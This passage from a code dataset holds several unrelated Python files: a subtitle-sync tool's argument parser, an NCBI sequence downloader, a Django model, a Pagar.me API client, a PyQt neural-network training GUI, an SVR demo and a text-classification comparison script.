dest='smooth_radius',\n help='Radius of smoothing median filter. [%(default)s]')\n\n # 10 frames at 23.976\n parser.add_argument('--max-ts-duration', default=1001.0 / 24000.0 * 10, type=float, metavar='',\n dest='max_ts_duration',\n help='Maximum duration of a line to be considered typesetting. [%(default).3f]')\n # 10 frames at 23.976\n parser.add_argument('--max-ts-distance', default=1001.0 / 24000.0 * 10, type=float, metavar='',\n dest='max_ts_distance',\n help='Maximum distance between two adjacent typesetting lines to be merged. [%(default).3f]')\n\n # deprecated/test options, do not use\n parser.add_argument('--test-shift-plot', default=None, dest='plot_path', help=argparse.SUPPRESS)\n parser.add_argument('--sample-type', default='uint8', choices=['float32', 'uint8'], dest='sample_type',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--sample-rate', default=12000, type=int, metavar='', dest='sample_rate',\n help='Downsampled audio sample rate. [%(default)s]')\n\n parser.add_argument('--src-audio', default=None, type=int, metavar='', dest='src_audio_idx',\n help='Audio stream index of the source video')\n parser.add_argument('--src-script', default=None, type=int, metavar='', dest='src_script_idx',\n help='Script stream index of the source video')\n parser.add_argument('--dst-audio', default=None, type=int, metavar='', dest='dst_audio_idx',\n help='Audio stream index of the destination video')\n # files\n parser.add_argument('--no-cleanup', action='store_false', dest='cleanup',\n help=\"Don't delete demuxed streams\")\n parser.add_argument('--temp-dir', default=None, dest='temp_dir', metavar='',\n help='Specify temporary folder to use when demuxing stream.')\n parser.add_argument('--chapters', default=None, dest='chapters_file', metavar='',\n help=\"XML or OGM chapters to use instead of any found in the source. 'none' to disable.\")\n parser.add_argument('--script', default=None, dest='script_file', metavar='',\n help='Subtitle file path to use instead of any found in the source')\n\n parser.add_argument('--dst-keyframes', default=None, dest='dst_keyframes', metavar='',\n help='Destination keyframes file')\n parser.add_argument('--src-keyframes', default=None, dest='src_keyframes', metavar='',\n help='Source keyframes file')\n parser.add_argument('--dst-fps', default=None, type=float, dest='dst_fps', metavar='',\n help='Fps of the destination video. 
Must be provided if keyframes are used.')\n parser.add_argument('--src-fps', default=None, type=float, dest='src_fps', metavar='',\n help='Fps of the source video. Must be provided if keyframes are used.')\n parser.add_argument('--dst-timecodes', default=None, dest='dst_timecodes', metavar='',\n help='Timecodes file to use instead of making one from the destination (when possible)')\n parser.add_argument('--src-timecodes', default=None, dest='src_timecodes', metavar='',\n help='Timecodes file to use instead of making one from the source (when possible)')\n\n parser.add_argument('--src', required=True, dest=\"source\", metavar='',\n help='Source audio/video')\n parser.add_argument('--dst', required=True, dest=\"destination\", metavar='',\n help='Destination audio/video')\n parser.add_argument('-o', '--output', default=None, dest='output_script', metavar='',\n help='Output script')\n\n parser.add_argument('-v', '--verbose', default=False, dest='verbose', action='store_true',\n help='Enable verbose logging')\n parser.add_argument('--version', action='version', version=VERSION)\n\n return parser\n\n\ndef parse_args_and_run(cmd_keys):\n def format_arg(arg):\n return arg if ' ' not in arg else '\"{0}\"'.format(arg)\n\n args = create_arg_parser().parse_args(cmd_keys)\n handler = logging.StreamHandler()\n if console_colors_supported and os.isatty(sys.stderr.fileno()):\n # enable colors\n handler.setFormatter(ColoredLogFormatter())\n else:\n handler.setFormatter(logging.Formatter(fmt=ColoredLogFormatter.default_format))\n logging.root.addHandler(handler)\n logging.root.setLevel(logging.DEBUG if args.verbose else logging.INFO)\n\n logging.info(\"Sushi's running with arguments: {0}\".format(' '.join(map(format_arg, cmd_keys))))\n start_time = time.time()\n run(args)\n logging.info('Done in {0}s'.format(time.time() - start_time))\n\n\ndef main():\n try:\n parse_args_and_run(sys.argv[1:])\n except SushiError as e:\n logging.critical(e.message)\n sys.exit(2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sushi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":8023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331539186","text":"# -*- coding = utf-8 -*-\n# @Time :2021-02-08 15:49\n# @Author : Broth Yang\n# @File :NCBI.py\n# @Software :PyCharm\n\nimport requests\n\n\ndef Write_Fasta(Key, data):\n fileName = Key + '.fasta'\n with open('./fasta/'+fileName, 'w', encoding='utf-8') as fp:\n fp.write(data)\n\n\ndef Get_Data():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63'\n }\n Key_word = str(input('请输入要搜索的关键词:'))\n url = 'https://www.ncbi.nlm.nih.gov/sviewer/viewer.fcgi?' 
+ 'id=' + Key_word + '&db=nuccore&report=fasta&extrafeat=null&conwithfeat=on&hide-cdd=on&retmode=html&withmarkup=on&tool=portal&log$=seqview&maxdownloadsize=1000000'\n res = requests.get(url=url, headers=headers, timeout=4)\n page_text = res.text\n Write_Fasta(Key_word, page_text)\n print('文件下载成功')\n\n\nif __name__ == '__main__':\n Get_Data()\n\n","sub_path":"ncbi.py","file_name":"ncbi.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"55187836","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Projet(models.Model):\n\tname = models.CharField(max_length=255)\n\tdescription = models.TextField()\n\tdeadline = models.DateField()\n\towner = models.ForeignKey(User, on_delete=models.CASCADE)\n\tremarques = models.TextField(null=True, blank=True)\n\t# photo = models.ImageField(null=True)\n\tslug = models.SlugField(unique=True)\n","sub_path":"src/projet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328238245","text":"import inquirer\nimport aiohttp\nimport logging\nimport json\nimport os\n\n_logger = logging.getLogger(\"Pagar.me API\")\nPAGARME_API = \"https://api.pagar.me/1\"\n\nAUTHENTICATION_METHOD = os.environ[\"AUTHENTICATION_METHOD\"]\nif AUTHENTICATION_METHOD == \"api_key\":\n API_KEY = os.environ[\"API_KEY\"]\nelif AUTHENTICATION_METHOD == \"user\":\n SESSION_ID = None\n ENVIRONMENT = os.environ[\"ENVIRONMENT\"]\n if ENVIRONMENT not in [\"test\", \"live\"]:\n raise ValueError(f\"Invalid ENVIRONMENT {ENVIRONMENT}\")\nelse:\n raise ValueError(f\"Invalid AUTHENTICATION_METHOD {AUTHENTICATION_METHOD}\")\n\n\nasync def _request(method, endpoint, params=None, body=None):\n url = PAGARME_API + endpoint\n\n # Set the authentication variables\n headers = dict()\n request_params = dict()\n if AUTHENTICATION_METHOD == \"api_key\":\n request_params[\"api_key\"] = API_KEY\n elif AUTHENTICATION_METHOD == \"user\":\n if SESSION_ID is not None:\n request_params[\"session_id\"] = SESSION_ID\n headers[\"X-Live\"] = \"1\" if ENVIRONMENT == \"live\" else \"0\"\n\n if params is not None:\n request_params.update(params)\n\n try:\n request = aiohttp.request(\n method, url, headers=headers, params=request_params, json=body)\n async with request as response:\n # If status is different from 200, something went wrong\n if response.status != 200:\n _logger.error(await response.text())\n return None\n data = await response.json()\n _logger.info(f\"{url} {params} {body}\")\n _logger.info(json.dumps(data))\n return data\n except aiohttp.ServerTimeoutError:\n _logger.error(f\"ServerTimeoutError - {url} {json.dumps(body)}\")\n except aiohttp.ClientConnectorError:\n _logger.error(f\"ClientConnectorError - {url} {json.dumps(body)}\")\n\n\nasync def post(endpoint, body=None):\n return await _request(\"POST\", endpoint, body=body)\n\n\nasync def get(endpoint, params=None):\n return await _request(\"GET\", endpoint, params=params)\n\n\ndef _save_session_id():\n with open(\".session_id\", \"w\") as session_file:\n session_file.write(SESSION_ID)\n\n\ndef _load_session_id():\n try:\n with open(\".session_id\", \"r\") as session_file:\n return session_file.read()\n except FileNotFoundError:\n return None\n\n\nasync def _get_user_info():\n endpoint = \"/user\"\n return await get(endpoint)\n\n\nasync def authenticate():\n global 
SESSION_ID\n\n if AUTHENTICATION_METHOD != \"user\":\n return True\n\n session_id = _load_session_id()\n if session_id is not None:\n SESSION_ID = session_id\n result = await _get_user_info()\n if result is not None:\n return True\n\n endpoint = \"/sessions\"\n\n questions = [\n inquirer.Text(\"email\", message=\"Email\"),\n inquirer.Password(\"password\", message=\"Password\")\n ]\n body = inquirer.prompt(questions)\n result = await post(endpoint, body=body)\n if result is not None:\n SESSION_ID = result[\"session_id\"]\n _save_session_id()\n return True\n return False\n","sub_path":"src/pagarme_api.py","file_name":"pagarme_api.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205068854","text":"import pandas as pd\r\nimport numpy as np\r\nfrom PyQt5 import QtWidgets,QtCore\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QVBoxLayout\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.pyplot import pause\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPRegressor\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import decomposition\r\n\r\n#Ui_MainWindow, QBaseApplication = uic.loadUiType('./form_canva.ui')\r\n\r\nUi_app, QBase = uic.loadUiType('./vistas/form_canva.ui')\r\n\r\nclass MainWindow(QMainWindow, Ui_app):\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n Ui_app.__init__(self)\r\n self.setupUi(self)\r\n\r\n # Widguet\r\n self.canvas = FigureCanvasQTAgg(Figure())\r\n vLayout = QVBoxLayout()\r\n vLayout.setContentsMargins(0, 0, 0, 0)\r\n vLayout.addWidget(self.canvas)\r\n self.widget_canva.setLayout(vLayout)\r\n\r\n self.llenar_combo()\r\n self.btngraficar.clicked.connect(self.graphTraining)\r\n\r\n def llenar_combo(self):\r\n\r\n iteraciones = []\r\n \r\n for a in range(100,1000,100):\r\n iteraciones.append(str(a))\r\n\r\n self.cbxiteraciones.addItems(iteraciones)\r\n\r\n \r\n def getAxes(self, nRows, nColumns, position):\r\n return self.canvas.figure.add_subplot(nRows, nColumns, position)\r\n\r\n def toGraph(self):\r\n self.canvas.figure.tight_layout()\r\n self.canvas.draw()\r\n self.canvas.flush_events()\r\n pause(.0001)\r\n\r\n def graphTraining(self):\r\n axes = self.getAxes(1, 2, 1)\r\n axesFunc = self.getAxes(1, 2, 2)\r\n\r\n df = pd.read_csv('./csv/bateria.csv')\r\n x = df['Tiempo']\r\n y = df['Carga']\r\n\r\n X = x[:, np.newaxis] # Realizas un array de los datos dependientes para tener una mejor estructura de ellos.\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y)\r\n\r\n\r\n # Llenado de las tablas entrenamiento\r\n\r\n fila = 0\r\n row = 0\r\n \r\n self.tableWidgetentrenamiento.setColumnCount(2)\r\n self.tableWidgetentrenamiento.setHorizontalHeaderLabels(['Tiempo/Minuto', 'Carga'])\r\n self.tableWidgetentrenamiento.setGeometry(QtCore.QRect(110, 200, 274, 250))\r\n\r\n for dato in X_train:\r\n fila = fila + 1\r\n \r\n self.tableWidgetentrenamiento.setRowCount(fila)\r\n\r\n for dato in X_train:\r\n\r\n x1 = QtWidgets.QTableWidgetItem(str(dato[0]))\r\n\r\n self.tableWidgetentrenamiento.setItem(row, 0, x1)\r\n\r\n row = row + 1\r\n\r\n row=0\r\n\r\n for dato in y_train:\r\n\r\n x2 = QtWidgets.QTableWidgetItem(str(dato))\r\n\r\n self.tableWidgetentrenamiento.setItem(row, 1, x2)\r\n\r\n row = row + 1\r\n\r\n 
self.tableWidgetentrenamiento.verticalHeader().setVisible(False)\r\n\r\n # Llenado de las tablas pruebas\r\n\r\n fila = 0\r\n row = 0\r\n \r\n self.tableWidgetprueba.setColumnCount(2)\r\n self.tableWidgetprueba.setHorizontalHeaderLabels(['Tiempo/Minuto', 'Carga'])\r\n self.tableWidgetprueba.setGeometry(QtCore.QRect(540, 200, 274, 250))\r\n\r\n for dato in X_train:\r\n fila = fila + 1\r\n \r\n self.tableWidgetprueba.setRowCount(fila)\r\n\r\n for dato in X_test:\r\n\r\n x1 = QtWidgets.QTableWidgetItem(str(dato[0]))\r\n\r\n self.tableWidgetprueba.setItem(row, 0, x1)\r\n\r\n row = row + 1\r\n\r\n row=0\r\n\r\n for dato in y_test:\r\n\r\n x2 = QtWidgets.QTableWidgetItem(str(dato))\r\n\r\n self.tableWidgetprueba.setItem(row, 1, x2)\r\n\r\n row = row + 1\r\n\r\n self.tableWidgetprueba.verticalHeader().setVisible(False)\r\n\r\n row=0\r\n\r\n #lr = 0.001\r\n #alpha = 0.0001\r\n #nn = [9, 1]\r\n max_iter = int(self.cbxiteraciones.currentText())\r\n\r\n # hidden_layer_sizes = cantidad de neurona que poseera el algoritmo en la capa oculta\r\n\r\n mlp = MLPRegressor(solver='sgd', alpha=1e-4, hidden_layer_sizes=(60), max_iter=int(self.cbxiteraciones.currentText()), tol=1e-4, random_state=1)\r\n\r\n i = 1\r\n\r\n while i <= max_iter:\r\n mlp.partial_fit(X_train, y_train)\r\n score1 = r2_score(y_test, mlp.predict(X_test))\r\n score2 = mlp.score(X_train, y_train)\r\n\r\n axesFunc.clear()\r\n axesFunc.set_title('Trining')\r\n axesFunc.plot('Tiempo', 'Carga', data=df,\r\n c='blue', label='Real Data - Value')\r\n axesFunc.plot(df['Tiempo'], mlp._predict(\r\n X), 'r--', c='red', label='Neural Network Model')\r\n axesFunc.grid(True)\r\n axesFunc.tick_params(labelleft=False)\r\n axesFunc.legend(loc='upper right')\r\n\r\n axes.clear()\r\n axes.set_title('Loss')\r\n axes.plot(range(len(mlp.loss_curve_)), mlp.loss_curve_,\r\n label='Epoch {}/{} - Score {:.2f}'.format(i, max_iter, score2))\r\n axes.grid(True)\r\n axes.legend(loc='upper right')\r\n axes.tick_params(labelleft=False)\r\n self.toGraph()\r\n if score1 > .95 and score2 > .95:\r\n break\r\n i += 1","sub_path":"panaderia-ia/controladores/neurona.py","file_name":"neurona.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183768862","text":"from sklearn import svm\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nsvm回归\n\nclf = svm.SVR()\nclf.fit(x, y)\nclf.predict(test)\n\"\"\"\n\n\ndef test():\n \"\"\"\n 总的来说径向基核函数的回归效果最好,线性核只适合直线的回归\n :return:\n \"\"\"\n x = np.sort(5 * np.random.rand(40, 1), axis=0) # 随机生成40*1的二维数组\n y = np.sin(x).ravel() # 用six求数据的解,并将解铺平成一维数组,对应着x中每一行的值\n y[::5] += 3 * (0.5 - np.random.rand(8)) # 更改原来完全拟合好的数据,相当于加入噪音\n\n svr_rbf = svm.SVR(kernel='rbf', C=1e3, gamma=0.1)\n svr_lin = svm.SVR(kernel='linear', C=1e3)\n svr_poly = svm.SVR(kernel='poly', C=1e3, degree=2)\n\n y_rbf = svr_rbf.fit(x, y).predict(x)\n y_lin = svr_lin.fit(x, y).predict(x)\n y_poly = svr_poly.fit(x, y).predict(x)\n\n lw = 2\n plt.scatter(x, y, color='darkorange', label='data')\n plt.plot(x, y_rbf, color='navy', lw=lw, label='RBF model')\n plt.plot(x, y_lin, color='c', lw=lw, label='Linear model')\n plt.plot(x, y_poly, color='cornflowerblue', lw=lw, label='Polynomial model')\n plt.xlabel('data')\n plt.ylabel('target')\n plt.title('Support Vector Regression')\n plt.legend()\n 
plt.show()\n\n\ntest()","sub_path":"SVM/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160716280","text":"# Text Classification Example with Selected Newsgroups from Twenty Newsgroups\n\n# Author: Thomas W. Miller (2019-03-08)\n# Modified by: John Kiley (2019-05-04)\n\n# Compares text classification performance under random forests\n# Six vectorization methods compared:\n# TfidfVectorizer from Scikit Learn\n# CountVectorizer from Scikit Learn\n# HashingVectorizer from Scikit Learn\n# Doc2Vec from gensim (dimension 50)\n# Doc2Vec from gensim (dimension 100)\n# Doc2Vec from gensim (dimension 200)\n\n# See example data and code from \n# https://scikit-learn.org/0.19/datasets/twenty_newsgroups.html\n\n# The 20 newsgroups dataset comprises around 18000 newsgroups \n# posts on 20 topics split in two subsets: one for training (or development) \n# and the other one for testing (or for performance evaluation). \n# The split between the train and test set is based upon messages \n# posted before and after a specific date.\n\n# =============================================================================\n# Establish working environment\n# =============================================================================\n\nimport multiprocessing\nimport re,string\nimport os\nfrom pprint import pprint\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer,\\\n CountVectorizer, HashingVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.cross_decomposition import CCA # canonical correlation\nfrom sklearn.model_selection import train_test_split\n\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\n\n\nimport nltk\nfrom nltk.stem import PorterStemmer\n\n# =============================================================================\n# Set global variables\n# =============================================================================\n\nstoplist = nltk.corpus.stopwords.words('english')\nDROP_STOPWORDS = False\nSET_RANDOM = 9999\nSTEMMING = False # judgment call, parsed documents more readable if False\nMAX_NGRAM_LENGTH = 2 # try 1 and 2 and see which yields better modeling results\nVECTOR_LENGTH_LIST = [8, 16, 32, 64, 128, 256, 512] # set vector length for TF-IDF and Doc2Vec\nWRITE_VECTORS_TO_FILE = False\n\n# JSON lines file for storing canonical correlatin results across many runs\ncancor_results_file = open('cancor-results-file.jsonl', 'a+') # open new file or append to existing\n\n#%%\n# =============================================================================\n# Utility Functions \n# =============================================================================\n\n# define list of codes to be dropped from document\n# carriage-returns, line-feeds, tabs\ncodelist = ['\\r', '\\n', '\\t'] \n\n# text parsing function for entire document string\ndef parse_doc(text):\n text = text.lower()\n text = re.sub(r'&(.)+', \"\", text) # no & references \n text = re.sub(r'pct', 'percent', text) # replace pct abreviation \n text = re.sub(r\"[^\\w\\d'\\s]+\", '', text) # no punct except single quote \n text = re.sub(r'[^\\x00-\\x7f]',r'', text) # no non-ASCII strings \n if text.isdigit(): text = \"\" # omit words that are all digits \n for code in codelist:\n text = re.sub(code, ' ', text) # get rid of escape codes \n # replace multiple spacess with one space\n text = 
re.sub('\\s+', ' ', text) \n return text\n\n# text parsing for words within entire document string\n# splits the document string into words/tokens\n# parses the words and then recreates a document string\n# returns list of parsed words/tokens and parsed document string\ndef parse_words(text): \n # split document into individual words\n tokens=text.split()\n re_punc = re.compile('[%s]' % re.escape(string.punctuation))\n # remove punctuation from each word\n tokens = [re_punc.sub('', w) for w in tokens]\n # remove remaining tokens that are not alphabetic\n tokens = [word for word in tokens if word.isalpha()]\n # filter out tokens that are one or two characters long\n tokens = [word for word in tokens if len(word) > 2]\n # filter out tokens that are more than twenty characters long\n tokens = [word for word in tokens if len(word) < 21]\n # filter out stop words if requested\n if DROP_STOPWORDS:\n tokens = [w for w in tokens if not w in stoplist] \n # perform word stemming if requested\n if STEMMING:\n ps = PorterStemmer()\n tokens = [ps.stem(word) for word in tokens]\n # recreate the document string from parsed words\n text = ''\n for token in tokens:\n text = text + ' ' + token\n return tokens, text \n\n#%% \n# =============================================================================\n# Import data from JSON lines file\n# =============================================================================\n\n# identify directory JSON lines files \ndocdir = r'C:\\Users\\johnk\\Desktop\\Grad School\\6. Spring 2019\\1. MSDS_453_NLP\\6. Homework\\week5\\economics\\econ\\files'\n\nprint('\\nList of file names in the data directory:\\n')\nprint(os.listdir(docdir))\n\nall_data = []\n\nfor file in os.listdir(docdir): \n if file.endswith('.jsonl'):\n file_name = file.split('.')[0] # keep name without extension\n with open(os.path.join(docdir,file), 'rb') as f:\n for line in f:\n all_data.append(json.loads(line))\n\n#%%\n# =============================================================================\n# Unpack the list of dictionaries to create data frame\n# =============================================================================\n\nurl = []\ntitle = []\ntags = []\ntext = []\nlabels = []\nfinal_processed_tokens = [] # list of token lists for Doc2Vec\nfinal_processed_text = [] # list of document strings for TF-IDF\nlabels = [] # use filenames as labels\nfor doc in all_data:\n url.append(doc['url'])\n title.append(doc['title'])\n tags.append(doc['tags'])\n labels.append(doc['labels'])\n text_string = doc['text']\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n text.append(text_string)\n final_processed_tokens.append(tokens)\n final_processed_text.append(text_string)\n\ndf = pd.DataFrame({\"url\": url,\n \"title\": title,\n \"tags\": tags,\n \"text\": text,\n \"labels\": labels},)\n\n#the following is an example of what the processed text looks like. 
\nprint('\\nBeginning and end of the data frame:\\n')\nprint(df.head(2))\nprint(df.tail(2))\n\n#%%\n# =============================================================================\n# Split the corpus into training & testing sets\n# =============================================================================\n\ntrain_data, test_data = train_test_split(all_data, random_state=1)\n\n#%%\n# =============================================================================\n# Preprocess the training set; set asside labels\n# =============================================================================\ntrain_titles = []\ntrain_tokens = [] # list of token lists for gensim Doc2Vec\ntrain_text = [] # list of document strings for sklearn TF-IDF\ntrain_target = [] # use filenames as labels\nfor doc in train_data:\n train_titles.append(doc['title'])\n text_string = doc['text']\n train_target.append(doc['labels'])\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n train_tokens.append(tokens)\n train_text.append(text_string)\n \n \nprint('\\nNumber of training documents:',\n\tlen(train_text))\t\n#print('\\nFirst item after text preprocessing, train_text[0]\\n', \n#\ttrain_text[0])\nprint('\\nNumber of training token lists:',\n\tlen(train_tokens))\t\n#print('\\nFirst list of tokens after text preprocessing, train_tokens[0]\\n', \n#\ttrain_tokens[0])\n#%%\n# =============================================================================\n# Spot check; confirm labels & titles match up\n# =============================================================================\n\npprint(train_titles[:10])\npprint(train_target[:10])\n\n#%%\n# =============================================================================\n# Preprocess the testing set; set asside labels\n# =============================================================================\ntest_tokens = [] # list of token lists for gensim Doc2Vec\ntest_text = [] # list of document strings for sklearn TF-IDF\ntest_target= [] # use filenames as labels\ntest_titles = []\n\nfor doc in test_data:\n test_titles.append(doc['title'])\n text_string = doc['text']\n test_target.append(doc['labels'])\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n test_tokens.append(tokens)\n test_text.append(text_string)\n\n\nprint('\\nNumber of testing documents:',\n\tlen(test_text))\t\n#print('\\nFirst item after text preprocessing, test_text[0]\\n', \n#\ttest_text[0])\nprint('\\nNumber of testing token lists:',\n\tlen(test_tokens))\t\n#print('\\nFirst list of tokens after text preprocessing, test_tokens[0]\\n', \n#\ttest_tokens[0])\n#%%\n# =============================================================================\n# Spot check; confirm labels & titles match up\n# =============================================================================\n\npprint(test_titles[:10])\npprint(test_target[:10])\n\n#%%\n\n# =============================================================================\n# Perform TFIDF & Word2Vec canonical correlation analysis\n# =============================================================================\n \n# create list for saving canonical correlation results\ncancor_results = [] \n\nfor VECTOR_LENGTH in VECTOR_LENGTH_LIST: \n print('\\n---------- VECTOR LENGTH ', str(VECTOR_LENGTH), ' ----------\\n')\n # 
=============================================================================\n # TF-IDF\n # =============================================================================\n # note the ngram_range will allow you to include multiple-word tokens \n # within the TFIDF matrix\n # Call Tfidf Vectorizer\n print('\\nWorking on TF-IDF vectorization')\n Tfidf = TfidfVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n \tmax_features = VECTOR_LENGTH)\n\n # fit the vectorizer using final processed documents. \n TFIDF_matrix = Tfidf.fit_transform(final_processed_text) \n\n tfidf_solution = pd.DataFrame(TFIDF_matrix.toarray()) # for modeling work \n\n #creating datafram from TFIDF Matrix\n matrix = pd.DataFrame(TFIDF_matrix.toarray(), \n \tcolumns = Tfidf.get_feature_names(), \n \tindex = labels)\n\n if WRITE_VECTORS_TO_FILE:\n tfidf_file_name = 'tfidf-matrix-'+ str(VECTOR_LENGTH) + '.csv'\n matrix.to_csv(tfidf_file_name)\n print('\\nTF-IDF vectorization complete, matrix saved to ', tfidf_file_name, '\\n')\n\n # =============================================================================\n # gensim Doc2Vec\n # =============================================================================\n \n print(\"\\nWorking on Doc2Vec vectorization\")\n documents = [TaggedDocument(doc, [i]) for i, doc in enumerate(final_processed_tokens)]\n model = Doc2Vec(documents, vector_size = VECTOR_LENGTH, window = 2, \n \tmin_count = 1, workers = 4)\n\n doc2vec_df = pd.DataFrame()\n for i in range(0,len(final_processed_tokens)):\n vector = pd.DataFrame(model.infer_vector(final_processed_tokens[i])).transpose()\n doc2vec_df = pd.concat([doc2vec_df,vector], axis=0)\n\n doc2vec_solution = doc2vec_df # for modeling work\n\n doc2vec_df = doc2vec_df.reset_index()\n\n doc_titles = {'title': labels}\n t = pd.DataFrame(doc_titles)\n\n doc2vec_df = pd.concat([doc2vec_df,t], axis=1)\n\n doc2vec_df = doc2vec_df.drop('index', axis=1)\n doc2vec_df = doc2vec_df.set_index('title')\n\n if WRITE_VECTORS_TO_FILE:\n doc2vec_file_name = 'doc2vec-matrix-'+ str(VECTOR_LENGTH) + '.csv'\n doc2vec_df.to_csv(doc2vec_file_name)\n print('\\nDoc2Vec vectorization complete, matrix saved to ', doc2vec_file_name, '\\n')\n\n # =============================================================================\n # Canonical Correlation... 
show relationship between TF-IDF and Doc2Vec\n # =============================================================================\n\n n_components = 3\n cca = CCA(n_components)\n cca.fit(X = tfidf_solution, Y = doc2vec_solution)\n\n U, V = cca.transform(X = tfidf_solution, Y = doc2vec_solution)\n\n for i in range(n_components):\n corr = np.corrcoef(U[:,i], V[:,i])[0,1]\n\n print('\\nCanonical correlation betwen TF-IDF and Doc2Vec for vectors of length ', \n str(VECTOR_LENGTH), ':', np.round(corr, 3), '\\n')\n\n cancor_results.append(np.round(corr, 3))\n\n data = json.dumps({\"STEMMING\":STEMMING,\n \"MAX_NGRAM_LENGTH\":MAX_NGRAM_LENGTH,\n \"VECTOR_LENGTH\":VECTOR_LENGTH,\n \"CANCOR\":np.round(corr, 3)}) \n cancor_results_file.write(data)\n cancor_results_file.write('\\n')\n\nprint('\\nSummary of Canonoical Correlation between TF-IDF and Doc2Vec Vectorizations\\n')\nprint('\\nVector Length Correlation')\nprint('\\n-------------------------')\nfor item in range(len(VECTOR_LENGTH_LIST)):\n print(' ', VECTOR_LENGTH_LIST[item], ' ', cancor_results[item])\n\ncancor_results_file.close()\n\n#%%\n# =============================================================================\n# TF-IDF Vectorization\n# =============================================================================\n\ntfidf_vectorizer = TfidfVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n max_features = VECTOR_LENGTH)\ntfidf_vectors = tfidf_vectorizer.fit_transform(train_text)\nprint('\\nTFIDF vectorization. . .')\nprint('\\nTraining tfidf_vectors_training.shape:', tfidf_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use tfidf_vectorizer.transform, NOT tfidf_vectorizer.fit_transform\ntfidf_vectors_test = tfidf_vectorizer.transform(test_text)\nprint('\\nTest tfidf_vectors_test.shape:', tfidf_vectors_test.shape)\ntfidf_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ntfidf_clf.fit(tfidf_vectors, train_target)\ntfidf_pred = tfidf_clf.predict(tfidf_vectors_test) # evaluate on test set\nprint('\\nTF-IDF/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, tfidf_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Count Vectorization\n# =============================================================================\n\ncount_vectorizer = CountVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n max_features = VECTOR_LENGTH)\ncount_vectors = count_vectorizer.fit_transform(train_text)\nprint('\\ncount vectorization. . 
\n\n#%%\n# =============================================================================\n# Count Vectorization\n# =============================================================================\n\ncount_vectorizer = CountVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n max_features = VECTOR_LENGTH)\ncount_vectors = count_vectorizer.fit_transform(train_text)\nprint('\ncount vectorization. . .')\nprint('\nTraining count_vectors_training.shape:', count_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use count_vectorizer.transform, NOT count_vectorizer.fit_transform\ncount_vectors_test = count_vectorizer.transform(test_text)\nprint('\nTest count_vectors_test.shape:', count_vectors_test.shape)\ncount_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ncount_clf.fit(count_vectors, train_target)\ncount_pred = count_clf.predict(count_vectors_test) # evaluate on test set\nprint('\nCount/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, count_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Hashing Vectorization\n# =============================================================================\n\nhashing_vectorizer = HashingVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n n_features = VECTOR_LENGTH)\nhashing_vectors = hashing_vectorizer.fit_transform(train_text)\nprint('\nhashing vectorization. . .')\nprint('\nTraining hashing_vectors_training.shape:', hashing_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use hashing_vectorizer.transform, NOT hashing_vectorizer.fit_transform\nhashing_vectors_test = hashing_vectorizer.transform(test_text)\nprint('\nTest hashing_vectors_test.shape:', hashing_vectors_test.shape)\nhashing_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\nhashing_clf.fit(hashing_vectors, train_target)\nhashing_pred = hashing_clf.predict(hashing_vectors_test) # evaluate on test set\nprint('\nHashing/Random forest F1 classification performance in test set:',\n round(metrics.f1_score(test_target, hashing_pred, average='macro'), 3))\n\n#%%\n# =============================================================================\n# Doc2Vec\n# =============================================================================\n\n# =============================================================================\n# Doc2Vec Vectorization (50 dimensions)\n# =============================================================================\n\n# 